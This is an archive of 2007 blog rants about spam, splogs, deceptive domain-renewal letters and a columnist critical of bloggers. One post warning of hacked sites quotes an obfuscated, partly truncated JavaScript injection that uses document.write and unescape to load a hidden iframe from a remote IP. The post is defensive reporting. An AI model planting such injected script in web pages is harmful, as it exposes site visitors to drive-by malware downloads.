Archive for the 'asshattery' Category

More fun with spam – pseudo-spiritual edition

Sunday, November 18th, 2007

Got this gem today:

“Know thyself” is a universal dictum passed down the centuries from all sources of wisdom. As the 21st century dawns, it has become apparent authentic self-knowledge requires comprehension of various fields of research, not only the many schools of psychology, but fields as diverse as anthropology, linguistics, neurology, and yoga, as well as insights stimulated by quantum physics and empirical explorations of alternate states of consciousness. A balanced interweaving of these and other approaches to the mind, such as literature and art, facilitates an extensive grasp of our human predicament, which is indispensable for an individual’s inner growth. But covering all this requires years of full time research. How could one possibly go about such an endeavor when caught up with today’s pace of schooling and career? Is there a solution? What if someone were to spend half a century traveling the earth, accumulating such significant knowledge along with vast worldly experience, then skillfully condense it all into one book? Remarkably, this has been accomplished.

And apparently it has been accomplished without grokking that spammers suck.

Author, poet, artist, [name of narcissistic asshole redacted] set out forty years ago to pursue a life of Zorba the
Greek adventure merged with Socratic questioning of all knowledges, which developed into a spiritual quest of the most compelling sort. After four decades of hard road travel over half the earth, [this asshole] spent seven years condensing his accumulation of knowledge into one truly informative work, [asshole’s book title redacted]. This book is gradually being internationally recognized for it’s original approach to the ultimate questions concerning the human situation.

Such as: why do spammers suck? Oh wait… scratch that one…

[This shitty book] is a challenging, enriching journey, encompassing the evolution of consciousness, while skillfully weaving mysticism, theology, psychology, philosophy, quantum physics, neurology, music, art, into meaningful and relevant patterns of clarification, never losing sight of the central theme-the endeavor to realize bottom line truths concerning our place amid the wild wonder of it all, and [this asshole] accomplishes this without succumbing to New Age credulity or sterile scientific skepticism. Every person truly concerned with the essence of philosophical inquiry and spiritual growth should have a copy close at hand.

Bottom line truth of email: spam sucks. Spam heavy on the woo sucks marginally less than spam for penis pills, Nigerian scams, and pump-and-dump stock scams, but it still sucks. Somehow you’d think someone who had mastered this spiritual pursuit would have also learned that spamming is largely the province of scam artists.

On second thought, I think I’ve answered my own question. After all, it’s just the spiritual version of “get a bigger wang,” isn’t it?

A malicious IP address to watch for: []

Monday, April 23rd, 2007

If you get an alert that your browser is trying to download something (anything!) from [], don’t do it. Why, you ask?

Because it’s probably a Trojan Horse, that’s why!

Here’s the deal – y’all probably know that I help run The Mystery of the Haunted Vampire, right? Well, some of the latest comment spam that we’ve been getting has followed a very particular pattern: .edu and .org sites (legitimate sites) with link spam goodness in support directories, like “files” or “data” or “html” or “images” – whatever. That isn’t too important. The kicker is that these f*ckers are also downloading the main index page and modifying it. Badly set site permissions then allow these spambags to post the modified main page (that looks exactly like the original back) to the main site.

The problem is that this new page is itself a Trojan Horse – it now contains a JavaScript that loads content from another site. Buried within the HTML of the hacked page is something that looks like this:

<script language="javascript"gt; document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E
%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>

That blah%blah%blah represents URL encoding – “unescape” tells the JavaScript to turn that gobbledy-gook back into readable characters, which in turn translates to This IP address is owned by a Russian ISP incorporated in Panama.

A Russian-owned ISP incorporated in Panama. Repeat that a couple of times, m’kay?

No, that doesn’t sound suspicious at all, does it?

They’ve changed their tactics a little over the past couple of days. When I first saw this script, they were trying to write borderless, scrolless 1 x 1 frames (ie, invisible) from the site – now, they’re masquerading as various proprietary (but safe-sounding) file formats. Whatever happens, don’t click OK!

How did I find this out? Well, yesterday after going through my standard anti-spam paces of notifying one of the victims that they’d been hacked, I notified the Russian/Panamanian ISP that they had a rogue customer since this was the 3rd or 4th time I’d seen that same IP address embedded in the JavaScript. This evening, I was browsing a random site while looking for possible vacation rentals and got the “Do you want to download this file” message – from the same IP address!

D’oh! It isn’t the IP address that’s rogue – it might be the whole bloody company!

So there you have it, kids. Don’t download anything from Russians working in Panama (God, that sounds like a Warren Zevon song, doesn’t it? Or something out of Gibson. Or Burgess, even). And if anyone from the network in question ( tries to sell you their services, ask ’em about the spammers that they harbor, ‘kay?

And lastly, if you did click “OK” recently? I hope you’ve a.) got good anti-virus software and b.) got a backup of your critical files. You’re probably going to need both…

[Updated to add: Oh yeah – if you’re using Internet Explorer, you’re *so* going to need anti-virus software. These f*ckers have been around for a while. Note to self: Russian ISPs in Panama are not to be notified that they have rogue customers – they are the rogue customers.]

EWWWW! Ew, ew, ew, eeeeeee-wwwwww!

Monday, April 23rd, 2007

In cleaning out this morning’s attempted comment spam, I found something that really gave me pause. I mean, really gave me pause. Nestled in between the typical links for sex, drugs, and rock n’ roll ringtones was a cluster of links for celebrity nudie pix. Standard enough, right?

Smack dab in the middle of those purported celeb nudes? Anna Nicole Smith autopsy photos. Nude, of course.


I mean, really… WTF? That’s just wrong on so many levels. Me, if I’m looking for skin pics, I prefer them with all their organs in the proper places*. And Y-incisions? A definite turn off. Just a thought.

*re: ‘in the proper places’ – I started to write ‘on the inside’, but strictly speaking, that wouldn’t be entirely true… Unless by ‘on the inside’ we mean… Oh, never mind.

Ah, the ironies abound…

Thursday, April 12th, 2007

Let’s see: we have a professional asshole, writing about those dirty bloggers, calling them assholes for being, well, assholes. He’s also pissed off because some of these assholes have the temerity to call themselves ‘journalists’. Oh yeah, and mostly he’s pissed off that they won’t use their real names while being assholes:

If you’re going to fire a rocket at someone in a blog post, or anywhere else, at least have the class to use your real name and stand behind your vitriol. Anything less makes you a coward and invalidates whatever bile you’ve spewed.

My name is on this, and I’m calling you gutless if you don’t sign yours. What are you going to do about it, blogger boy?

Why, I think you know exactly what I’m going to do about it: blog about it. And I’m going to call you an asshole.


So, to Tony Long, who feels that having his name on something makes it more important: Fuck you. First, there’s a difference between anonymous and pseudonymous – look it up, or ask your editor to explain it to you in very small words.

Oh, wait – you’re listed as ‘copy chief’, so that means you should already know the difference. Hmmm… What an interestingly deliberate misunderstanding.

Second, not all bloggers have pretensions of being journalists – very few, in fact. I certainly don’t pretend to be a journalist, I’m just some pseudonymous guy with a blog, and the bloggers who do aspire to taking more of a journalist-style role do, in fact, largely hold themselves to many of the same standards as dead tree journalists. Certainly the ones worth reading on a regular basis do. Not all of them use their real names, but so what? Dead tree columns are still written under pseudonyms, too.

What gets under your skin isn’t the fact that some bad (and slapdash) writers happen to hide behind the label of journalist and happen to use rude words; no, what you don’t like is that you no longer have a monopoly on, well, being an asshole. I mean, what else are we going to call a tech columnist who calls themselves “The Luddite”? Really, if that isn’t a textbook case of asshole, I don’t know what is. (It might even cross the line into pretentious asshole.)

See, Tony (and here’s your dirty little secret) – you aren’t a journalist either. You’re an opinion columnist. Oh, you want to be a journalist, but this gives it away: “The Luddite: Commentary by Tony Long.”

Commentary. Not reporting.


Contra your title, the blogosphere isn’t “Where a Tawdry Culture Goes To Die”. Rather, it’s where anyone who wants to take the time to do so can express an opinion, in whatever manner they choose. You’re just another voice, Tony. You’re a voice that has the luxury of being paid to exist. But you aren’t anything special. You’re one voice clamoring for attention among thousands – LOOK AT ME, LOOK AT ME, LOOK AT ME.

And that having to compete really frosts your ‘nads, doesn’t it? You aren’t special. You’re just another asshole with a computer, being an asshole. Just like me. An asshole with a computer, commenting on the things that catch my interest.

So there. I’ve looked at you, and, well, found you wanting. Welcome to the blogosphere, Tony.


Truth in advertising

Tuesday, March 20th, 2007

It’s a spamalicious morning, I guess. In my own blog’s spam trap this morning was this nugget:

i sell im crap….read me.

me internet marketing guru

Phil Coel

me internet marketing guru

Why yes – you do sell crap. How refreshingly honest! But ‘guru’? Dunno ’bout that, Phil; this just makes you look like an idiot. Maybe you’re being joe-jobbed – if that’s the case, then you’ve got some damage control to do, because I’ve reported your site to Google Ads.

So Phil? Me not internet marketing guru. Me not sell im crap. Me blogger. Me not like spam.

And, like clockwork…

Thursday, March 8th, 2007

Just to make the point of my previous post, because I used a magic phrase, a splog named O2 Bazaar sent me a trackback within an hour of posting.

How do I know O2 Bazaar is a splog? Because it’s only a month old, and has no original content – just 36 posts of stuff they’ve scraped from other blogs. So, to pee in their Google juice, let’s try this, shall we? The phrase that they like is:

‘dedicated server’ – O2 Bazaar = spammers
‘dedicated server’ – O2 Bazaar = content thieves
‘dedicated server’ – O2 Bazaar = asshats
‘dedicated server’ – O2 Bazaar = splog

O2 Bazaar is run by asshats who steal the content of others. They sell nothing, they provide nothing. They are the pubic lice of the blogosphere. They also edit the content of others to highlight the phrase related to stuff that they’re stealing: in this case, the asshats like ‘dedicated server’. Got that, O2 Bazaar? ‘dedicated server’ spammers?

How’re they gonna like that on their front page? When/if the trackback comes in, I’ll take a screenshot of them…

Oh, and if you run across a splog like O2 Bazaar that is using GoogleAds to raise revenue, report them to Google. Click on the “Ads by Google” link, then select “Provide feedback about the site you just visited.” – even dumber than I thought possible

Sunday, February 11th, 2007

So, I got a reply from their customer service. You’re gonna love it:

Thank you for writing to us at

I do understand your concern to close your account. I am sorry to know that you are receiving fraudulent e-mails. I’ve checked and found that our investigation department is working to find out the resolution.

Before authorizing us to close your account, please read the following information carefully. Further action is required in order to close your account.

I don’t want you to close MY account! I’m not getting email! It’s comment spam! I want you to shut down the comment spammer’s account!

Oy. – thickheaded about blog spam

Sunday, February 11th, 2007

So, The Mystery of the Haunted Vampire has been getting some new trackback and comment spam, all attempting to spamvertise bogus storefronts. These sites are clearly bullshit, and they look like they’re taking advantage of a security hole of some kind in Amazon’s Associates program, probably lax validation when accounts and storefronts are created. I say lax validation because it probably looks like these bastards have a script set up to automatically generate these storefronts. So I fired off an email to Amazon’s customer service telling them about this… and got back this response:

Thank you for writing to us. We received your message wondering if an e-mail you received is really from Unfortunately, we didn’t receive a copy of the suspicious e-mail, so I cannot determine its origin.

You morons! It isn’t about email at all, and I clearly stated so in my complaint! It’s trackback spam and comment spam, and you’re hosting the stores! Shut the damn sites down!

Yeesh. Thick.

I’ve responded using their “No, this wasn’t helpful” link – we’ll see what comes of it. If I get the same sort of BS, I’ll use their “leave a phone number and we’ll call you” service and see if I can get a better response…

Asshats: Domain Registry of America

Saturday, January 27th, 2007

Today I got a letter from these asshats about, among other things, this domain name. The letter states in part:

You must renew your domain name to retain exclusive rights to it on the Web, and now is the time to transfer and renew your names from your current registrar to the Domain Registry of America.

All true – except for the ‘now is the time to transfer’ part. You see, the entire letter is set up to make you think a.) that you are about to lose your domain names and b.) that you have to pay these bastards in order to keep it. In addition, they were offering to sell me variations on my domain name – at US$50 per domain for a two year registration.

Of course, one of the other things that they don’t tell you is that many registrars charge you to switch domains from one registrar to another, so you could be facing costs from your old registrar on top of the high prices these guys charge for domains.

So what do these frauds offer? Registration. You don’t even get bare-bones hosting for your $30 or $50. Oh yeah – they resell SSL certificates, too. Big fscking deal. And they’ll generously submit your site for search engine inclusion for another $40/yr.

Domain Registry of America: deceptive asshats. Did I mention that they were deceptive asshats?